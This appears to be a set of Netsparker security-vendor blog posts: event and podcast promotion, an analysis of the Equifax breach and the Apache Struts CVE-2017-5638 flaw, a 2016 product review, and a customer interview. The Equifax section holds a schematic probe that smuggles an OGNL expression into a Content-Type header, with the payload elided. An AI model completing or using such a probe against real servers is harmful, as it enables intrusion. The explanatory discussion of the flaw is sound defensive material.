Ferruh also explains that the automated nature of Netsparker Cloud facilitates the task of keeping thousands of websites and web applications secure. Development teams will not be overwhelmed by securing a large number of websites.

Toward the end of the interview, Ferruh also provides tips on how teams can start to tackle the massive problem of securing thousands of web applications, where their effort should be directed, and how best to use team resources quickly and efficiently.

You can listen to the full Risky Business Episode #468 on the Risky Business website. Ferruh’s interview is the last feature in the podcast and begins at the 37-minute mark.

Netsparker Sponsors BSides DC 2017

We are excited to announce our sponsorship of the B-Sides DC conference in Washington, D.C., which takes place on the 7th and 8th of October 2017. During the conference, we will be exhibiting Netsparker, our award-winning web application security scanner.

B-Sides DC is a community-driven event developed by and for information security practitioners who seek to expand the spectrum of conversations and create opportunities, in an intimate atmosphere that encourages collaboration.

The venue for B-Sides DC is the Renaissance Washington DC Downtown Hotel.

For more information, visit the B-Sides DC website where you can find out more about the event and how to support it.

Come by our booth while at B-Sides DC 2017

If you are attending B-Sides DC, then come and visit us at our booth. We will be more than happy to answer any questions you might have about web application vulnerability scanning and Netsparker.

The Equifax Breach – The Signs Were There

Whenever a big data breach happens – like the Equifax one – there is almost always a predictable order of subsequent events:

  1. The breach happens
  2. The affected company announces it
  3. The news outlets pick up the story and make it known to the general public
  4. Security researchers wonder how the breach might have happened and investigate further

Then there is the aha moment: security researchers stumble upon a catastrophic lack of security practices, countless vulnerabilities and breaches of well-established protocols.

Does It Have to Be Like This?

In the end, the public often knows more about the dangerous vulnerabilities in the company's website than the actual attacker. Given enough eyeballs, all bugs become more shallow – particularly once an organisation is under public scrutiny.

Going back to the series of events, you might conclude that we could completely eliminate events one to three if more security researchers examined the security of their own products. So what would have happened if someone had warned Equifax about vulnerabilities on their websites before the breach happened? Would they have listened to concerned researchers?

In 2016 Equifax Was Notified of a Cross-site Scripting Vulnerability on Their Website

It seems that – even though they were notified in 2016 about a vulnerability on their website – they did not address the issue. In this instance, XSS (Cross-site Scripting) is probably not the reason the Equifax website was breached. However, the incident does shed light on their security practices.

The consensus about the Equifax breach is that they were vulnerable to another kind of web application vulnerability – one that does not require interaction by a privileged user to gain access to administrative functions. Instead, it is one that usually results in the complete compromise of a web server and the applications running on it – Remote Code Execution (RCE).

Equifax Website Hacked Through the Exploitation of CVE-2017-5638

On March 6, 2017, the Apache Software Foundation published a security advisory about a new vulnerability affecting the Apache Struts 2 framework. By manipulating certain HTTP headers, an attacker could easily execute system commands on affected systems.
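
To make the mechanism concrete: the flaw (CVE-2017-5638) was in the Jakarta multipart parser, which ended up evaluating OGNL expressions embedded in a malformed Content-Type header. Schematically, and with the actual payload deliberately elided, a probe looked something like this:

    import requests

    # Schematic illustration only -- not a working exploit. On vulnerable
    # Struts 2 hosts, an OGNL expression (%{...}) smuggled into the
    # Content-Type header was evaluated server-side by the multipart parser.
    malicious_content_type = "%{(#_='multipart/form-data').(...)}"  # elided

    requests.get(
        "https://vulnerable.example/",  # placeholder host
        headers={"Content-Type": malicious_content_type},
    )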

As often happens with this kind of vulnerability, it did not take long for attackers to take advantage of the flaw and use bots to crawl the web for vulnerable hosts. Organisations that take security seriously were unaffected, because they immediately followed the recommended steps to fix it. However, many did not, as reported by security researcher David Hoyt.

He posted screenshots of the vulnerability in question being exploited on the website annualcreditreport.com, which is owned by Equifax, Experian and TransUnion. They were notified about their vulnerable website by David Hoyt four days after the Apache Struts advisory was released, but he never heard back from them.

According to Equifax, the data breach occurred between mid-May and July. Therefore, if they had acknowledged and reacted to the security researcher's report, the vulnerability would have been closed and other systems could have been checked for it as well, avoiding the breach and all the mess they are in right now.

David Hoyt on the State of Security of the AnnualCreditReport Website

We asked David Hoyt for his thoughts on the vulnerability and Equifax’s decision not to respond. He sent us a detailed report about the Apache Struts deserialization vulnerability in www.annualcreditreport.com, with a few surprising statements:

The Form on annualcreditreport.com accepts the PII of Consumers, then connects via API to the 3 Credit Reporting Agencies, and other Fraud and Loss Control Partners. The typical Form containing 1 SSN may be parsed and distributed to many, many more 3rd parties. Any successful Attack may expose millions of PII Records from a Database.

This seems to suggest that if the hackers had chosen to attack annualcreditreport.com, they could have compromised a far greater number of accounts and would have breached Experian and TransUnion as well. Given the easily exploitable vulnerability that David Hoyt found in the website, it is surprising that it had not already been exploited by attackers before the breach was announced.

No WAFs or IDS/IPS were Installed in Front of the AnnualCreditReport Website

Dissecting some of the Indicators of Poor Judgement, my own research indicated _no_ Web Application Filter in front of annualcreditreport.com or consumer.experian.in and neither Site had any IDS/IPS to block Command Line Injection.

This is surprising for such a large website. While many Web Application Firewalls can be bypassed, they should still be implemented, since they act as a first line of defense when a new vulnerability is made public. It is doubtful whether they can halt seasoned attackers completely, but they are great for blocking automated attacks and can be used to slow down hackers until a patch is applied. This should be a basic security measure for anyone dealing with Personally Identifiable Information such as SSNs, but the fact that it was not applied by Equifax put consumers’ data at unnecessary risk.

Information Security Vendors and Service Providers Can Do More

Hoyt also thinks that Information Security vendors and service providers could do more to prevent so many websites remaining unpatched days after such announcements:

The InfoSec Industry should work on mitigating the exposure of their Clients in the first 24 hours after major Bug announcements, not promoting SEO Campaigns. Alerting an Organization to this Apache Struts Vulnerability should have received priority as the business day came to a close on March 10, 2017 at 4pm Eastern Time. At that point in time, at least 72 hours had elapsed since the Public Announcement.

Fixing serious vulnerabilities that affect a wide range of customers should be a top priority on the IT security professional's agenda. In recent years, there were lots of security issues that had serious consequences for numerous companies – vulnerabilities such as Shellshock and Heartbleed. Within a relatively short time after the announcement, hackers had already devised automated exploits.

Corporations Should Have a Vulnerability Disclosure Process or Bug Bounty

While a few years ago you could patch your applications days after the announcement, nowadays you cannot let more than a few hours elapse. The chances of someone exploiting vulnerabilities within just a few minutes are very high. This is especially true for web application vulnerabilities, where exploits are generally fast and easy to build.

But there were other problems that came to light following Hoyt's discovery. There was no obvious way for him to report his findings about annualcreditreport.com to Equifax.

The fact that none of the Credit Agencies currently have a Coordinated Vulnerability Disclosure Process or Bug Bounty indicates to me they don't understand the big picture of Bug Reporting.

A good way to ensure that researchers can report the possible flaws they identify in your web applications is to have an advertised and coordinated Vulnerability Disclosure or Bug Bounty Program.

The Federal Trade Commission (FTC) Should be More Proactive

Another thing that David Hoyt found disturbing was the lack of oversight from the FTC.

The FTC should take steps to monitor the Security Posture of such an important Website in Real Time and not rely on executives to Notify for a Breach after their Stock Sales have Settled.

The fact that the announcement of the Equifax breach came months after it happened put consumers at unnecessary risk. Had the FTC had existing insight into the company's IT security procedures, the general public would have known about the breach much earlier and could have reacted appropriately.

Netsparker's 2016 in Review

2016 was a great year for Netsparker! We were the first (and only) web application security scanner vendor to introduce a number of cutting-edge technologies that make it possible to scale up web scanning and easily scan hundreds or thousands of websites, without having to spend hours configuring complex tools and days verifying that the vulnerabilities the scanner has detected are not false positives.

In 2016 we also introduced monthly updates for our web application security scanner, and we were featured in a number of interviews on some popular podcasts and more, as highlighted in this overview post.

Automating and Scaling Up Web Vulnerability Scanning

The first Netsparker update we released in 2016 focused on automation and scalability. We developed features in the scanner to help users automate much more of both the pre-scan (configuration) and post-scan (verifying the results) work. The February 2016 update of the Netsparker scanner included:

  • Automatic recognition and configuration of URL rewrite rules: you do not need to know the URL rewrite configuration on the target or manually configure the scanner for it to crawl and scan all the parameters on the target website.

  • Proof-Based Scanning Technology: a technology that automatically generates a proof of exploit for the identified vulnerabilities, so you do not have to manually verify them. A short two-minute video on how this technology works was also produced in 2016.

The February 2016 update of the Netsparker web application security scanner also included a number of other new features and improvements.

Monthly Web Security Scanner Updates

In April 2016 we started releasing monthly updates of both Netsparker web scanner editions. The advantage of monthly releases is that you do not have to wait four, five or more months to start using a new feature. If a feature is developed, it means it is needed and will help you automate more, so we release each feature as soon as it is ready.

Apart from all the new features and scanner improvements, every month we introduce new web vulnerability checks and improve the existing ones. We also frequently add new security checks, such as checks for Subresource Integrity and Content Security Policy, to help you build more secure web applications.

Free Netsparker Cloud Scans, Interviews and More from Netsparker

In 2016 we also announced free Netsparker Cloud web vulnerability scans for open source projects. Several open source projects are already benefitting from this campaign, including OpenCart, who are featured in this web security case study.

Our CEO Ferruh Mavituna was also interviewed several times during 2016, starting with an interview at RSA in San Francisco in which he explains what Netsparker is, followed by four more interviews on the popular security show Paul’s Security Weekly.

We also hosted a webcast with our friends from Denim Group on how to optimize your application security program with Netsparker and ThreadFix.

What’s in Store for Netsparker Web Security Scanner in 2017?

In 2016 we pushed the boundaries of what we can automate in web application security. For 2017 the mantra will be the same: continue improving the cloud-based and desktop editions of our web application security scanner in terms of features, ease of use, automation and scanning capabilities.

Hesk Developer Uses Netsparker to Automate Web Application Security

“I have a hard time finding any negative aspects to Netsparker Cloud. It is hands down a great tool — all you could wish for from an automated web security scanner. Easy to use and detailed with a low false positive rate.”

The customer is always right, and we at Netsparker could not agree more with this statement. So what could be better than an interview with one of our web scanner’s users? This interview with Klemen Stirn, the project lead, developer and support team for Hesk, explains why he found Netsparker to be a great tool for automating and scaling up web application security, thanks to its ease of use and ample support.

Tell us a little more about Hesk and your role in the project.

Believe it or not, Hesk is currently a “one man team”. I fulfill the roles of project lead, developer and support team. Hesk is free help desk software that allows businesses to set up a web-based, ticket-driven customer support system. The philosophy behind Hesk is that not everyone needs large and complicated customer support software; there is a need for a small and simple alternative.

Are you able to provide some specific details about the size and scope of Hesk?

Sure, I’ll do my best! Because Hesk can be downloaded anonymously, determining an exact user base is a little tricky. Looking at the Google Analytics data and download statistics, I would estimate that there are somewhere between 50k-100k installations and active users.

So clearly you have a significant user-base who rely on Hesk being secure. What else can you tell us about the application itself?

I started development of Hesk back in 2005. It was a long, slow process that involved adding both features and functionality over time. I wrote Hesk from the ground up without relying on any framework, and I use only a handful of third-party libraries (including HTML Purifier, POP3/SMTP and JavaScript libraries). At this point in time, the application has over 100k lines of code and is still growing.

Prior to Netsparker Cloud, how did you approach and deal with the challenge of web application security?

It has been both a challenge and a learning process. Obviously, I needed to pay close attention to any code or application functionality that might result in potential attack vectors — a time-consuming and detail-oriented process.

It has also helped that Hesk ships with source code. As a result, I have benefited from several third-party code reviews performed by pen testers. In addition, several vulnerabilities have been reported by Hesk end-users.

How has Netsparker Cloud changed your web application security protocols?

Well, the biggest change is that I now have Hesk installed on a test server. I use Netsparker Cloud to perform full scans as well as any required re-scans. My process now involves using Netsparker Cloud before any new version is pushed into a live environment or made available to the public.

I’ve never relied upon any automated web application security scanners before so this has resulted in a huge improvement in efficiency and confidence.

I’m able to write more secure code because Netsparker brings the latest vulnerabilities and best practices to my attention in a timely manner.

I feel more confident that the latest release isn’t introducing new vulnerabilities. Trusting that you’re releasing a secure application (to the best extent possible), makes it easier to sleep at night.

Are there any confirmed and resolved vulnerabilities you’re able to disclose?

Absolutely! Netsparker Cloud found a confirmed XSS vulnerability inside the administrator control panel.

Also, it helped to identify several necessary feature enhancements, including forcing SSL connections, marking cookies as Secure and HttpOnly where needed, and adding X-Frame-Options headers to help prevent Clickjacking.

Do you have any experiences with Netsparker support which you’d like to share?

I don’t — which is a good thing. Netsparker is very intuitive and easy to use so I’ve never had to rely on support.

What else can you share about your experience with Netsparker Cloud?

Free software is usually backed by a relatively small number of active developers; in the case of Hesk, it's a "one man show".

Because of this, any automated tool that performs a highly-specialized task (for example, a web application security scanner) is a godsend.

Netsparker Cloud is one such tool. It was a breeze to set up. I started my first cloud scan in literally a few minutes. This allowed me to spend precious time and resources on other priorities while waiting for the scan to complete.

Scan results are well organized, prioritized and provide verbose information where needed. For example, as a developer, I found the exact HTTP Request and Response very useful for reproducing issues and pinpointing/fixing them.

At times it felt like having someone looking over my shoulder pointing out even the smallest details that need attention; things that may take very little developer effort to fix, but in the end, help to make web applications like Hesk even more secure.

I have a hard time finding any negative aspects to Netsparker Cloud. It is hands down a great tool — all you could wish for from an automated web security scanner. Easy to use and detailed with a low false positive rate.
